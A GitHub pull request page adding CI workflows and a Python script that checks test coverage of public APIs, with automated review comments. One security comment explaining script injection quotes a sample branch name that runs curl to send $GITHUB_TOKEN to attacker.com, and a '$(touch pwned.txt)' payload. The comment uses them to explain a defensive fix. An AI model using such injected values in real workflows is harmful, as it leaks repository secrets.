Closed
Changes from 2 commits
25 changes: 25 additions & 0 deletions .github/workflows/check_coverage.yml
@@ -0,0 +1,25 @@
name: API Coverage Check

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

jobs:
  api_coverage:
    name: "Check public API test coverage"
    runs-on: ubuntu-latest
    timeout-minutes: 5
    steps:
      - uses: actions/checkout@v4

      - uses: actions/setup-python@v5
        with:
          python-version: "3.12"

      - name: Check public API test coverage
        run: python scripts/check_test_coverage.py

      - name: Check public function assertions
        run: python scripts/check_asserts.py
41 changes: 41 additions & 0 deletions .github/workflows/cpu_ref_tests.yml
@@ -0,0 +1,41 @@
name: CPU Reference Tests

on:
  push:
    branches: [main]
    paths:
      - "tops/cpu/**"
      - "tests/ref/**"
  pull_request:
    branches: [main]
    paths:
      - "tops/cpu/**"
      - "tests/ref/**"
Comment on lines +4 to +13

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# First, check if the files exist
ls -la .github/workflows/cpu_ref_tests.yml 2>/dev/null && echo "✓ Workflow file exists" || echo "✗ Workflow file missing"
ls -la .github/ci/cpu-ref-tests-gpu.sky.yaml 2>/dev/null && echo "✓ SkyPilot config exists" || echo "✗ SkyPilot config missing"

# List files in these directories
echo -e "\n=== Files in .github/workflows/ ==="
ls -1 .github/workflows/ 2>/dev/null | head -20

echo -e "\n=== Files in .github/ci/ ==="
ls -1 .github/ci/ 2>/dev/null | head -20

Repository: primatrix/pallas-kernel

Length of output: 473


🏁 Script executed:

#!/bin/bash
# Read the workflow file
echo "=== .github/workflows/cpu_ref_tests.yml ==="
cat -n .github/workflows/cpu_ref_tests.yml

Repository: primatrix/pallas-kernel

Length of output: 2228


🏁 Script executed:

#!/bin/bash
# Read the SkyPilot config file to check if it exists and what's in lines 10-24
if [ -f ".github/ci/cpu-ref-tests-gpu.sky.yaml" ]; then
  echo "=== .github/ci/cpu-ref-tests-gpu.sky.yaml (lines 1-30) ==="
  head -30 .github/ci/cpu-ref-tests-gpu.sky.yaml | cat -n
else
  echo "File .github/ci/cpu-ref-tests-gpu.sky.yaml not found"
  echo "Searching for similar files..."
  find .github -name "*.sky.yaml" -o -name "*cpu*ref*" 2>/dev/null
fi

Repository: primatrix/pallas-kernel

Length of output: 872


🏁 Script executed:

#!/bin/bash
# Search for any references to the SkyPilot file in the workflow or other CI files
echo "=== References to 'cpu-ref-tests' or '.sky.yaml' in workflows ==="
rg -i "cpu-ref-tests|sky.yaml" .github/workflows/ --no-heading -n 2>/dev/null || true

echo -e "\n=== All YAML files in .github/ ==="
find .github -name "*.yaml" -o -name "*.yml" | sort

Repository: primatrix/pallas-kernel

Length of output: 587


Include the delegated CI files in this trigger set.

This workflow fully delegates execution to .github/ci/cpu-ref-tests-gpu.sky.yaml (lines 16-24 contain the dependency setup and pytest execution), but neither that file nor this workflow itself is included in the trigger paths. A PR that only changes the CI wiring will merge without ever exercising this check.

🛠️ Suggested change
   push:
     branches: [main]
     paths:
+      - ".github/workflows/cpu_ref_tests.yml"
+      - ".github/ci/cpu-ref-tests-gpu.sky.yaml"
       - "tops/cpu/**"
       - "tests/ref/**"
   pull_request:
     branches: [main]
     paths:
+      - ".github/workflows/cpu_ref_tests.yml"
+      - ".github/ci/cpu-ref-tests-gpu.sky.yaml"
       - "tops/cpu/**"
       - "tests/ref/**"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/cpu_ref_tests.yml around lines 4 - 13, The workflow
trigger is missing the delegated CI file, so changes to the delegated pipeline
won't run this check; update the workflow triggers in cpu_ref_tests.yml to
include the delegated CI file(s) (at least the file named
cpu-ref-tests-gpu.sky.yaml or the .github/ci/** folder) so edits to the
delegated CI wiring cause the workflow to run; modify the push and pull_request
paths blocks to add those paths alongside "tops/cpu/**" and "tests/ref/**".
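
As a rough illustration of the gap described in this comment, the sketch below approximates the `paths` filter in Python. It uses `fnmatch` as a stand-in for GitHub's filter-pattern matching, which is an assumption (the real matcher has its own glob rules), and the helper name `would_trigger` is hypothetical.

```python
from fnmatch import fnmatchcase

# Path filters from the workflow before and after the suggested change.
CURRENT_PATHS = ["tops/cpu/**", "tests/ref/**"]
SUGGESTED_PATHS = [
  ".github/workflows/cpu_ref_tests.yml",
  ".github/ci/cpu-ref-tests-gpu.sky.yaml",
  *CURRENT_PATHS,
]


def would_trigger(changed_files, path_filters):
  """Return True if any changed file matches any filter (fnmatch approximation)."""
  return any(
    fnmatchcase(changed, pattern)
    for changed in changed_files
    for pattern in path_filters
  )


# A PR that only touches the delegated CI config.
ci_only_change = [".github/ci/cpu-ref-tests-gpu.sky.yaml"]
print(would_trigger(ci_only_change, CURRENT_PATHS))    # False
print(would_trigger(ci_only_change, SUGGESTED_PATHS))  # True
```

Under this approximation, a change limited to the delegated config matches none of the current filters, which is the situation the comment warns about.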


concurrency:
  group: cpu-ref-tests-${{ github.head_ref || github.ref_name }}
  cancel-in-progress: true

jobs:
  cpu_ref_tests:
    name: "CPU reference kernel tests"
    runs-on: ubuntu-latest
    timeout-minutes: 15
    steps:
      - uses: actions/checkout@v4

      - uses: actions/setup-python@v5
        with:
          python-version: "3.12"

      - name: Install uv
        uses: astral-sh/setup-uv@v4

Comment on lines +46 to +52

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

# First, let's check the actual workflow file to understand the context
cat -n .github/workflows/cpu_ref_tests.yml | head -60

Repository: primatrix/pallas-kernel

Length of output: 2049


🌐 Web query:

GitHub Actions context interpolation security github.head_ref command injection

💡 Result:

Yes, direct interpolation of GitHub Actions context variables like github.head_ref into shell commands (run: steps) enables command injection vulnerabilities. github.head_ref represents the source branch of a pull request (available in pull_request or pull_request_target events) and is attacker-controlled, especially in forks or pull requests.

Vulnerable pattern:

  - run: echo "${{ github.head_ref }}"

An attacker creates a branch named test"; curl https://attacker.com/?token=$GITHUB_TOKEN;#, injecting and executing arbitrary shell commands, potentially exfiltrating secrets like GITHUB_TOKEN. This is confirmed in official GitHub documentation on script injections, which lists github.head_ref as untrusted input that can lead to shell command injection when interpolated into inline scripts. Real-world examples include CVEs like CVE-2026-33475 (Langflow) and GHSA-7x29-qqmq-v6qc (ultralytics/actions), where unsanitized use of github.head_ref in run: steps allowed RCE via malicious branch names.

Mitigations (per GitHub docs):

1. Use environment variables:

     - env:
         HEAD_REF: ${{ github.head_ref }}
       run: echo "$HEAD_REF"

   The expression evaluates to a safe env var, preventing injection during shell script generation.
2. Prefer JavaScript actions over inline shell scripts for processing untrusted input.
3. Avoid the pull_request_target trigger unless necessary, as it provides write access and untrusted checkout.
4. Pin GITHUB_TOKEN permissions to read-only where possible.

Use in if: conditions or non-shell contexts (e.g., with:) is safe, as expressions are evaluated by the Actions engine, not the shell.


🌐 Web query:

GitHub Actions env vs run direct interpolation ${{ }} security best practices

💡 Result:

In GitHub Actions, using ${{ }} direct interpolation in the 'run' section with untrusted inputs (e.g., github.event.issue.title) is insecure because it enables command injection attacks. Attackers can craft inputs like '$(touch pwned.txt)' that get macro-expanded directly into the shell command.

Security best practice: Set potentially untrusted values in the 'env' section using ${{ }}, then reference them in 'run' using standard shell syntax (e.g., "$TITLE"). This stores the value in an environment variable, preventing direct injection into the command.

Example (vulnerable):

  - name: print title
    run: echo "${{ github.event.issue.title }}"

Example (secure):

  - name: print title
    env:
      TITLE: ${{ github.event.issue.title }}
    run: echo "$TITLE"

This applies to secrets too: pass secrets via env to avoid command-line exposure. Official GitHub recommendations emphasize this for mitigating script injection.


Don't interpolate github.head_ref directly into the shell.

Line 49 splices attacker-controlled branch names into the script body. A branch like foo$(...) will execute on the runner before BRANCH is assigned. Pass the value through env: and read the env var inside Bash instead.

🛠️ Suggested change
       - name: Generate cluster name
         id: cluster
+        env:
+          BRANCH_NAME: ${{ github.head_ref || github.ref_name }}
         run: |
-          BRANCH="${{ github.head_ref || github.ref_name }}"
+          BRANCH="$BRANCH_NAME"
           NAME="ci-ref-$(echo "$BRANCH" | tr '/_' '--' | tr '[:upper:]' '[:lower:]' | head -c 20)-${GITHUB_RUN_NUMBER}"
           echo "name=$NAME" >> "$GITHUB_OUTPUT"
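
The difference between the two forms can be reproduced locally. The sketch below is only a simulation under stated assumptions: it imitates `${{ ... }}` expansion with Python string formatting and runs the result with `sh`, and the branch name and the helper names `run_interpolated` and `run_via_env` are hypothetical.

```python
import os
import subprocess

# Hypothetical malicious branch name; the payload only echoes a marker string.
BRANCH = "foo$(echo INJECTED)"


def run_interpolated(branch):
  """Mimic `${{ ... }}` expansion: the value is pasted into the script text."""
  script = f'BRANCH="{branch}"\nprintf "%s" "$BRANCH"'
  return subprocess.run(
    ["sh", "-c", script], capture_output=True, text=True
  ).stdout


def run_via_env(branch):
  """Pass the value through the environment; the script text never changes."""
  script = 'BRANCH="$BRANCH_NAME"\nprintf "%s" "$BRANCH"'
  env = {**os.environ, "BRANCH_NAME": branch}
  return subprocess.run(
    ["sh", "-c", script], capture_output=True, text=True, env=env
  ).stdout


print(run_interpolated(BRANCH))  # fooINJECTED
print(run_via_env(BRANCH))       # foo$(echo INJECTED)
```

In the first case the shell sees the payload as part of its own source and runs it; in the second the payload is only ever data inside a variable.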
🧰 Tools
🪛 actionlint (1.7.11)

[error] 48-48: "github.head_ref" is potentially untrusted. avoid using it directly in inline scripts. instead, pass it through an environment variable. see https://docs.github.com/en/actions/reference/security/secure-use#good-practices-for-mitigating-script-injection-attacks for more details

(expression)

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/cpu_ref_tests.yml around lines 46 - 52, The step with id
"cluster" currently interpolates github.head_ref/github.ref_name directly into
the run script, which lets attacker-controlled branch names be executed; change
the step to pass those values via env: (e.g., set GITHUB_HEAD_REF: ${{
github.head_ref }} and GITHUB_REF_NAME: ${{ github.ref_name }}) and then inside
the run block read them from the environment (e.g.,
BRANCH="${GITHUB_HEAD_REF:-$GITHUB_REF_NAME}") before sanitizing and building
NAME; this removes direct shell interpolation of workflow expressions and
prevents branch names like `foo$(...)` from being executed.

      - name: Install dependencies
        run: |
          uv sync --extra dev
          uv pip install torch --index-url https://download.pytorch.org/whl/cpu

      - name: Run CPU reference tests
        run: |
          uv run pytest tests/ref/ -v -o "addopts=--strict-markers"
177 changes: 177 additions & 0 deletions scripts/check_test_coverage.py
@@ -0,0 +1,177 @@
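#!/usr/bin/env python3
"""
Check that every public interface under tops/ops/ has corresponding test coverage.

Scans the __init__.py of each tops/ops/ subpackage to extract the list of public
API symbols, then searches the tests/ directory to see whether each symbol is
referenced by at least one test file. If any interface is uncovered, the script
exits with a non-zero exit code, so it can be used as a CI gate.

Supported export styles:
  1. __all__ = ["symbol1", "symbol2", ...]
  2. from .mod import name as name  (PEP 484 explicit re-export)
"""

import ast
import re
import sys
from pathlib import Path


def _extract_dunder_all(tree: ast.Module) -> list[str]:
  """Extract the string constants from the __all__ list in the AST."""
  for node in ast.iter_child_nodes(tree):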

medium

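Consider iterating over tree.body instead of ast.iter_child_nodes(tree) to walk the module's top-level nodes. tree.body is the list of all top-level statements in the module, and it is the standard, more direct way to traverse them. ast.iter_child_nodes is a generic helper that yields every direct child of a node; for an ast.Module that is effectively the contents of tree.body, so using tree.body states the intent more clearly and follows idiomatic use of the ast module.

Suggested change
- for node in ast.iter_child_nodes(tree):
+ for node in tree.body: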
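
A small check of the suggestion, offered as a sketch rather than the PR's code: the module source and the symbol names in it are hypothetical, and `extract_dunder_all` is a simplified stand-in for the script's `_extract_dunder_all`.

```python
import ast

# Hypothetical __init__.py contents, used only for illustration.
SOURCE = '''
from .chunk import chunk_fwd
__all__ = ["chunk_fwd", "chunk_bwd"]
'''

tree = ast.parse(SOURCE)

# For a freshly parsed module, both iterations visit the same top-level nodes.
same_nodes = list(ast.iter_child_nodes(tree)) == tree.body


def extract_dunder_all(tree):
  """Return the string entries of a top-level `__all__ = [...]` assignment."""
  for node in tree.body:
    if not isinstance(node, ast.Assign):
      continue
    for target in node.targets:
      if isinstance(target, ast.Name) and target.id == "__all__":
        if isinstance(node.value, ast.List):
          return [
            elt.value
            for elt in node.value.elts
            if isinstance(elt, ast.Constant) and isinstance(elt.value, str)
          ]
  return []


print(same_nodes)                # True
print(extract_dunder_all(tree))  # ['chunk_fwd', 'chunk_bwd']
```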

    if not isinstance(node, ast.Assign):
      continue
    for target in node.targets:
      if isinstance(target, ast.Name) and target.id == "__all__":
        if isinstance(node.value, ast.List):
          return [
            elt.value
            for elt in node.value.elts
            if isinstance(elt, ast.Constant) and isinstance(elt.value, str)
          ]
  return []


def _extract_reexports(tree: ast.Module) -> list[str]:
  """Extract symbols explicitly re-exported in the 'from .mod import name as name' style."""
  names = []
  for node in ast.iter_child_nodes(tree):

medium

Likewise, consider using tree.body instead of ast.iter_child_nodes(tree) here, to improve readability and follow the idiomatic pattern of the ast module.

Suggested change
- for node in ast.iter_child_nodes(tree):
+ for node in tree.body:
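
To make the re-export rule concrete, here is a minimal sketch of the same filter written over `tree.body`. The module source and every name in it are hypothetical, and `extract_reexports` is a condensed stand-in for the script's `_extract_reexports`.

```python
import ast

# Hypothetical __init__.py contents covering each case the filter distinguishes.
SOURCE = '''
import os
from .gla import fused_gla as fused_gla   # explicit re-export: collected
from .gla import helper as _helper        # renamed: ignored
from .gla import internal                 # no alias: ignored
from typing import Any as Any             # absolute import (level 0): ignored
'''


def extract_reexports(tree):
  """Collect names imported relatively with an identical `as` alias."""
  names = []
  for node in tree.body:
    if isinstance(node, ast.ImportFrom) and node.level > 0:
      names.extend(a.asname for a in node.names if a.asname == a.name)
  return names


print(extract_reexports(ast.parse(SOURCE)))  # ['fused_gla']
```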

    if not isinstance(node, ast.ImportFrom):
      continue
    if node.level == 0:
      continue
    for alias in node.names:
      if alias.asname is not None and alias.asname == alias.name:
        names.append(alias.asname)
  return names


def discover_public_interfaces(ops_dir: Path) -> dict[str, list[str]]:
  """Scan the __init__.py of each tops/ops/ subpackage to discover public API symbols.

  Detection strategy (in priority order):
    1. If __init__.py contains __all__ = [...] → use the symbol names in it
    2. If __init__.py contains 'from .x import y as y' re-exports → collect those symbol names
    3. If __init__.py is empty or exports nothing → skip

  Args:
    ops_dir: path to the tops/ops/ directory

  Returns:
    dict mapping "tops.ops.<subpackage>" to its list of public symbol names
  """
  result = {}
  for subdir in sorted(ops_dir.iterdir()):
    if not subdir.is_dir():
      continue
    init_file = subdir / "__init__.py"
    if not init_file.exists():
      continue

    source = init_file.read_text(encoding="utf-8")
    if not source.strip():
      continue

    tree = ast.parse(source, filename=str(init_file))

    all_names = _extract_dunder_all(tree)
    if all_names:
      result[f"tops.ops.{subdir.name}"] = all_names
      continue

    reexports = _extract_reexports(tree)
    if reexports:
      result[f"tops.ops.{subdir.name}"] = reexports
      continue

  return result


def find_test_references(
  tests_dir: Path, symbols: list[str]
) -> dict[str, list[str]]:
  """Check which symbols are referenced in test files.

  Scans every .py file under tests/ (excluding tests/src/) and runs a
  word-boundary regex match for each symbol.

  Args:
    tests_dir: path to the tests/ directory
    symbols: list of symbol names to check

  Returns:
    dict mapping each symbol name to the list of test file paths that reference it
  """
  patterns = {
    sym: re.compile(r"\b" + re.escape(sym) + r"\b") for sym in symbols
  }
  references: dict[str, list[str]] = {sym: [] for sym in symbols}

  for py_file in sorted(tests_dir.rglob("*.py")):
    rel = py_file.relative_to(tests_dir)
    if rel.parts and rel.parts[0] == "src":
      continue

    content = py_file.read_text(encoding="utf-8")
    for sym, pattern in patterns.items():
      if pattern.search(content):
        references[sym].append(str(py_file))
Comment on lines +106 to +119

high

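The current implementation of find_test_references is inefficient. It compiles one regular expression per symbol, then walks every test file and tries each symbol's pattern against the file contents in turn. With a large number of symbols, this causes a lot of repeated work and performance overhead.

To optimize this, consider merging all symbols into a single, more complex regular expression. Each file then needs only one regex pass to find every referenced symbol. This can noticeably speed up the script, especially in CI.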

  if not symbols:
    return {}
  references: dict[str, list[str]] = {sym: [] for sym in symbols}
  combined_pattern = re.compile("\\b(" + "|".join(map(re.escape, symbols)) + ")\\b")

  for py_file in sorted(tests_dir.rglob("*.py")):
    rel = py_file.relative_to(tests_dir)
    if rel.parts and rel.parts[0] == "src":
      continue

    content = py_file.read_text(encoding="utf-8")
    for sym in set(combined_pattern.findall(content)):
      references[sym].append(str(py_file))
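
The two strategies can be compared on a small input. The sketch below assumes the symbols are plain Python identifiers; the symbol names, the sample file content, and both helper names are hypothetical.

```python
import re


def find_symbols_combined(content, symbols):
  """One alternation pattern, one pass over the content."""
  if not symbols:
    return set()
  combined = re.compile(r"\b(" + "|".join(map(re.escape, symbols)) + r")\b")
  return set(combined.findall(content))


def find_symbols_per_pattern(content, symbols):
  """One pattern per symbol, as in the original implementation."""
  return {
    sym for sym in symbols
    if re.search(r"\b" + re.escape(sym) + r"\b", content)
  }


# "chunk" is a prefix of "chunk_fwd", which is the case most likely to go wrong.
SYMBOLS = ["chunk", "chunk_fwd", "fused_gla"]
CONTENT = "from tops.ops.gla import chunk_fwd\nout = chunk_fwd(q, k, v)\n"

print(find_symbols_combined(CONTENT, SYMBOLS))     # {'chunk_fwd'}
print(find_symbols_per_pattern(CONTENT, SYMBOLS))  # {'chunk_fwd'}
```

Because both ends of the alternation are anchored with `\b` and the symbols contain only word characters, each match is a whole identifier, so a symbol that is a prefix of another does not shadow it.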


  return references


def main():
  project_root = Path(__file__).resolve().parents[1]
  ops_dir = project_root / "tops" / "ops"
  tests_dir = project_root / "tests"

  assert ops_dir.is_dir(), f"Directory does not exist: {ops_dir}"
  assert tests_dir.is_dir(), f"Directory does not exist: {tests_dir}"

  interfaces = discover_public_interfaces(ops_dir)

  if not interfaces:
    print("No public interfaces found in tops/ops/; nothing to check.")
    sys.exit(0)

  all_symbols = []
  for symbols in interfaces.values():
    all_symbols.extend(symbols)

  references = find_test_references(tests_dir, all_symbols)

  total = 0
  covered = 0
  gaps = []

  for pkg, symbols in sorted(interfaces.items()):
    print(f"\n{'=' * 60}")
    print(f"Package: {pkg} ({len(symbols)} interfaces)")
    print(f"{'=' * 60}")
    for sym in symbols:
      total += 1
      files = references.get(sym, [])
      if files:
        covered += 1
        print(f" [PASS] {sym} ({len(files)} test files)")
      else:
        gaps.append((pkg, sym))
        print(f" [MISS] {sym} -- no test coverage")

  print(f"\n{'=' * 60}")
  print(f"Summary: {covered}/{total} interfaces covered")
  print(f"{'=' * 60}")

  if gaps:
    print(f"\nCheck failed: {len(gaps)} interface(s) lack test coverage:")
    for pkg, sym in gaps:
      print(f" - {pkg}.{sym}")
    sys.exit(1)
  else:
    print("\nAll public interfaces have test coverage.")
    sys.exit(0)


if __name__ == "__main__":
  main()